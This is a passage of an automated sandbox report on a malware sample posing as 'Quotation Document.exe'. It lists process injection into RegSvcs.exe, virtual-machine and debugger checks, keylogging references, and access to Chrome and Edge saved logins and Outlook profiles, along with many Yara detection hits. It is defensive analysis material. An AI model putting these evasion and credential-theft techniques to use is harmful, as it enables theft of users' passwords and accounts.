                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594888Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594670Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594552Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3394Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6456Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598904Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598794Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598684Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598473Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597467Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597358Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597226Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596905Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596358Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596248Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596122Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596014Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595899Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595650Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594995Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594888Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594670Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594552Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422Jump to behavior
                Source: wscript.exe, 00000008.00000002.2859128996.00000204C8836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: wscript.exe, 00000008.00000002.2859128996.00000204C8836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: RegSvcs.exe, 00000007.00000002.2900815735.0000000000C7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end nodegraph_7-32358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_050FB850 LdrInitializeThunk,7_2_050FB850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040ADB0 GetProcessHeap,HeapFree,7_2_0040ADB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040E61C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00416F6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004123F1 SetUnhandledExceptionFilter,7_2_004123F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 964008Jump to behavior
                Source: C:\Users\user\AppData\Local\emboweling\neophobia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Quotation Document.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\emboweling\neophobia.exe "C:\Users\user\AppData\Local\emboweling\neophobia.exe" Jump to behavior
                Source: Quotation Document.exe, neophobia.exe.0.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,7_2_00417A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00412A15
                Source: C:\Users\user\Desktop\Quotation Document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2903015296.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2901951538.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2902379398.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905371247.0000000005090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2905033906.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8080, type: MEMORYSTR
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2830bfe.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c56458.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.5090000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2831ae6.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.2ba0ee8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c7e790.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.3c55570.6.raw.unpack, type: UNPACKEDPE
